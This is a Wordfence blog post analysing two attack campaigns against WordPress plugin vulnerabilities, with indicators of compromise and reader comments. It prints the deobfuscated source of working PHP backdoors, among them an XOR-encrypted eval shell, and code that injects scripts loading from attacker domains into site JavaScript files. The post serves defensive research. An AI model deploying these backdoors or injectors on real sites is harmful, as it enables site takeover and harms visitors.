Updates on WordPress security, Wordfence and what we're cooking in the lab today.

Wordfence Blog

Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities

This entry was posted in Research, WordPress Security on February 24, 2020 by Mikey Veenstra   5 Replies

As part of our ongoing research efforts, the Wordfence Threat Intelligence team continually monitors our network for noteworthy threats facing WordPress. Recently, we’ve been tracking malicious activity targeting several vulnerabilities recently patched in popular plugins.

In today’s post, we’ll provide details of our research into two active campaigns. We’ll also share some common indicators of compromise (IOCs) that can help you assess whether your site was impacted by these attacks. Wordfence malware scans will identify these IOCs and their variants on systems with the plugin installed, but we include them to help administrators and researchers better approach this data at scale.

Threat Actor #1: “tonyredball”

Notable Targeted Vulnerabilities:

The first campaign we’ll discuss has been associated with the handle “tonyredball”. This threat actor has primarily focused on exploiting vulnerabilities which allow backdoor access to victim sites.

We identified the “tonyredball” handle after the attacker attempted to exploit the administrator registration vulnerability in the Profile Builder plugin. Requests exploiting this vulnerability contain the username, email, and other profile details of the new administrator account.

Snippet from a blocked attempt to exploit Profile Builder by "tonyredball"Compared to this threat actor’s activity against Profile Builder, they’ve issued a much greater volume of attacks against the database deletion vulnerability in ThemeGrill Demo Importer. This difference in volume may be due to the amount of work required to exploit each vulnerability. The Profile Builder vulnerability requires attackers to locate a vulnerable registration form, but ThemeGrill’s vulnerability could be exploited with a simple request to a known endpoint.

The end result of exploiting either of these vulnerabilities is administrative access to the victim’s site. With this access, the attacker uploads malicious scripts through the plugin and theme uploaders in the WordPress dashboard.

Snippet of an attempt by "tonyredball" to upload a backdoor.

Snippet of an attempt by “tonyredball” to upload a backdoor.

Variants of the script uploaded in the example above have been previously associated with several filenames. The most common are blockspluginn.phpwp-block-plugin.php, and supersociall.php, though the primary names associated directly with this threat actor are wp-block-plugin.php and wp-hello-plugin.php.

if (isset($_POST['asavsdvds']) && md5($_POST["lgkfghdfh"]) == "e9787adc5271cb0f765294503da3f2dc") {
    $z2 = '<?php ' . base64_decode($_REQUEST['d1']);
    $a = '/tmp/mn';
    @file_put_contents($a, $z2);
    @include ($a);
    @unlink($a);
    die();
}

In the code sample above, we see part of the deobfuscated contents of wp-block-plugin.php. This small script allows an attacker to execute arbitrary PHP code on a victim’s site, establishing a persistent backdoor in case their administrator account is removed. The intended code is base64-encoded and submitted as $_REQUEST['d1'], where it’s decoded and stored as a file named /tmp/mn. This file is then executed via @include, and then immediately deleted from the server. It’s also password-protected to prevent other actors from using this backdoor.

We’ve intercepted a number of requests to these backdoors across our network. The payloads sent are varied in scope, but largely focus on iterating through a site’s file system to infect more files. Some events show “tonyredball” searching for additional WordPress installations to infect, while others try to inject malicious code into the victim’s legitimate JavaScript files.

if (strpos($g, 'hgkgfhjereve4') !== false) {
echo "#already exist#:".$f."\n";
} else {
$l2 = "var hgkgfhjereve4 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,108,111,119,46,100,101,115,116,105,110,121,102,101,114,110,97,110,100,105,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}";
$g = file_get_contents($f);
$g = $l2.$g;
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'hgkgfhjereve4') !== false) {
echo "#already exist#:".$f."\n";

This code snippet shows part of a backdoor payload intended to inject malicious JavaScript. In context, this code is executed after searching for filenames with .js and will insert new code above the existing content of the legitimate file. When run in a browser, this code sources a third-party script from https://slow.destinyfernandi.com/same.js?v=3.

This third-party script, when loaded, redirects the visitor’s browser to a potentially malicious location. Unlike more sophisticated malvertising scripts, there isn’t any conditional logic to prevent redirection for repeat visitors or logged-in users, meaning it’s much more likely to be caught and reported early. However, regardless of the current contents, scripts hosted on an attacker’s server can be modified at any time and it’s a major risk.

In addition to backdoor scripts, “tonyredball” also uses the WordPress plugin and theme editor to inject third-party JavaScript into a site’s content. A line like <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script> is added, usually to a theme’s header.php script, where it loads the script at https://middle.destinyfernandi.com/t.js into visitors’ browsers. We’ve identified additional domains used in these attacks, which are listed in the IOC section below.

 

Screenshot of a redirect destination attempting to trick visitors into allowing permissions.

Screenshot of a redirect destination attempting to trick visitors into allowing permissions.

Currently, these redirect scripts take victims to a landing page at the domain talktofranky.com. On arrival, visitors are told to click “Allow” in a popup to prove they’re human. This is a trick, as the site is actually requesting permission to push notifications to the victim’s device. Searches for discussion about this domain reveal a number of guides on how to stop the notification spam, meaning this campaign is likely claiming a number of victims.

The latest attacks by “tonyredball” are sourced from one primary IP address: 45.129.96.17. This address is associated with Estonian hosting provider GMHost. GMHost is a known bulletproof host, and has been referenced recently on hacking forums as such. “Bulletproof” refers to hosting providers known to have lax or unenforced abuse policies, commonly located in countries without close relationships with international law enforcement. These hosts give hackers a place to conduct illegal activity with little fear of being shut down or otherwise punished.

Indicators of Compromise (IOCs)

  • Username
    • tonyredball
  • Email address
    • tonyredball@mail.com
  • IP Addresses
    • 45.129.96.17
    • 188.127.251.74
  • Malware Hashes (SHA-1)
    • 34d4b9a33f7a1ab39a264cdffde644264adcf4d1
    • 7648b981f7c8f497ab81f0323379734fd0898f84
  • Searchable strings in obfuscated backdoors
    • jweyc
    • aeskoly
    • owhggiku
    • callbrhy
  • Script injected into plugin and theme files
    • <script type=text/javascript src='https://room.verybeatifulantony.com/t.js'></script>
    • <script type=text/javascript src='https://middle.destinyfernandi.com/t.js'></script>
  • Malicious Domains
    • verybeatifulantony.com
    • room.verybeatifulantony.com
    • tom.verybeatifulantony.com
    • destinyfernandi.com
    • slow.destinyfernandi.com
    • middle.destinyfernandi.com
    • fast.destinyfernandi.com
    • talktofranky.com
  • Malicious filename
    • wp-block-plugin.php
    • wp-hello-plugin.php

Threat Actor #2 – “solarsalvador1234”

Notable Targeted Vulnerabilities:

Similar to “tonyredball”, we identified the handle associated with today’s second threat actor through their exploitation of the Profile Builder administrator registration vulnerability. These requests revealed a more sophisticated attack campaign than our previous example, as the threat actor was generating unique identifiers for each attempt.

In the requests we’ve blocked from this attacker, we see randomly-generated alphanumeric strings used as usernames, first and last names, and email addresses. Identifiers generated in this manner begin with a prefix (com_ in early attacks, then just com subsequently) followed by eight random characters. These are indexed together: one attack might use comxAwqw5de as the username and comxAwqw5de@mail.com as the email, and the next attack would use a different generated string for those values.

However, for a period of about two and a half hours on February 17th, the requests weren’t using a random email address. More than a hundred blocked requests in this window used the same email address: solarsalvador1234@gmail.com. These attacks came from the same IP as the rest in this campaign, and still used the random naming scheme for the created usernames.

Screenshot of Google search results showing "solarsalvador1234" as an Author on multiple hacked sites.

Screenshot of Google search results showing “solarsalvador1234” as an Author on multiple hacked sites.

The email address solarsalvador1234@gmail.com has been previously associated with attacks against the Convert Plus plugin, where a similar vulnerability allowed attackers to register a privileged user. Google searches for this address reveal a number of compromised WordPress sites showing an associated user profile.

In addition to the Profile Builder and ThemeGrill Demo Importer vulnerabilities, the IP address associated with “solarsalvador1234” is also exploiting Duplicator’s recent file download flaw. By downloading wp-config.php files from vulnerable sites, they can use the stored credentials to access remote MySQL databases and compromise the site from there. In all three vulnerabilities, the end goal is the same: Administrative access to the victim’s WordPress site.

In the attacks we’re currently tracking, we’ve identified “solarsalvador1234” attempting to upload backdoors through the same method as “tonyredball”: the WordPress theme uploader. However, instead of uploading a single file as in our previous example, they upload a malicious archive named AdvanceImage5.zip. This ZIP archive technically contains a valid WordPress theme, having copied the index.php and style.css scripts from the Twenty Fifteen theme, required for WordPress to correctly store the extracted files. Other than those required files, the archive is purely malicious and contains backdoors intended to help the attacker maintain access long-term. The malicious theme AdvanceImage5 has previously been associated with other attack campaigns, including those targeting last year’s vulnerability in the WP Cost Estimation plugin.

 

<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function sh_decrypt($data, $key) { global $auth; return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key); } foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

The code snippet above shows the deobfuscated contents of the campaign’s primary backdoor, located in AdvanceImage5/header.php . This script features protections much like our earlier example, intended to prevent other attackers from abusing the script. Taking things a step further, an XOR cipher is used to encrypt requests sent to the backdoor, presumably in an attempt to bypass detection by firewalls and security teams. Ultimately though, the behavior is the same for “solarsalvador1234” as it is for the backdoor used by “tonyredball”, an attacker can execute PHP scripts at will on the infected site.

The activity associated with “solarsalvador1234” is linked to the IP address 77.71.115.52. We mentioned this address in our earlier post about attacks against a recent Duplicator vulnerability, noting that a number of otherwise-legitimate websites are hosted on the server. It’s not uncommon for attacks to come from compromised webservers, as they offer attackers a layer of abstraction to hide their physical location from victims.

Indicators of Compromise (IOCs)

  • Usernames
    • Randomly generated, starting with com or com_
  • Email addresses
    • solarsalvador1234@gmail.com
    • Other randomly generated addresses, starting with com or com_ and ending with @mail.com
  • IP Address
    • 77.71.115.52
  • Malware Hashes (SHA-1)
    • 47cb1646eba89f42319aa757423464476eb2fa7d
    • 3015d8f30b23eb6ebec608e992ff25ceccc6408d
    • f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6
    • 93632169238cbb52daee5271c90c533f7614e7b1
  • Malicious Filepaths
    • wp-content/themes/AdvanceImage5/config.php
    • wp-content/themes/AdvanceImage5/functions.php
    • wp-content/themes/AdvanceImage5/header.php

Conclusion

The campaigns we’ve detailed in this post are just two examples of attacks targeting recently patched vulnerabilities. As the owner of a site, it’s your responsibility to remain aware of the changes made to the plugins and themes you use. When a security update is released, make it an immediate priority to install it. The threat actors facing the WordPress ecosystem quickly identify and exploit vulnerabilities, which compounds the importance of timely action to protect your infrastructure.

All of the malicious code discussed in this post is detected by the Wordfence malware scanner. This is true for Premium users as well as the sites still using the free version. If you’re unable to use Wordfence and are concerned about these campaigns, please make use of the indicators of compromise (IOCs) we’ve shared to assist in your analysis.

The Wordfence Threat Intelligence team is always on the lookout for new activity to report to the community. Whether new developments arise in the campaigns we’ve discussed today, or something entirely new descends on the WordPress ecosystem, we’ll report our findings as they emerge.

Special thanks to Director of Threat Intelligence Sean Murphy and QA Engineer Ram Gall for their assistance researching these attack campaigns and editing this post.

Did you enjoy this post? Share it!

5 Comments on "Multiple Attack Campaigns Targeting Recent Plugin Vulnerabilities"

Terri February 24, 2020 at 11:07 am

:/ We have found a fair number of our user names were changed to "a" and the password changed to test when we were correcting our duplicator plugin holes.

Dennis Wilen February 24, 2020 at 5:34 pm

If you run a bunch of websites like I do, you get a lot of email from various themes, plugins, hosts, utilities, etc. You probably ignore most of them too.

But email from Wordfence is always worth reading.

Thank you Wordfence for your constant vigilance and exemplary communications.

Nisha Garg February 25, 2020 at 1:53 am

Though I did not find any additional user names or files in the plugins, do you think there is something we should manually check? I already had my all websites hacked and attacked a few ago. I had to reset my server and create them fresh to get rid of the malware files. The code and files were so many that they were hard to locate.

Mikey Veenstra February 25, 2020 at 3:04 pm

Hi Nisha! If you're concerned about malware after a hack, I recommend running Wordfence scans on the affected sites. The malware scanner will notify you if something's amiss. Our Security Services Team is another great resource if you want to be positive your sites are clean.

Nisha Garg February 26, 2020 at 1:56 am

Hi Mikey, after I reset my server, the first thing I did was installing Wordfence Security Plugin. Luckily, I am now receiving regular updates of website activity.

However, I personally feel "WordPress Site Cleaning Service" is way too expensive for me at the moment. Once I have enough to put, I will not stay behind.

Cheers!

Follow Us

      


Protect your websites with the #1 WordPress Security Plugin

Get Premium
Over 150 million downloads

Wordfence Newsletter

Get WordPress Security Alerts and Product Updates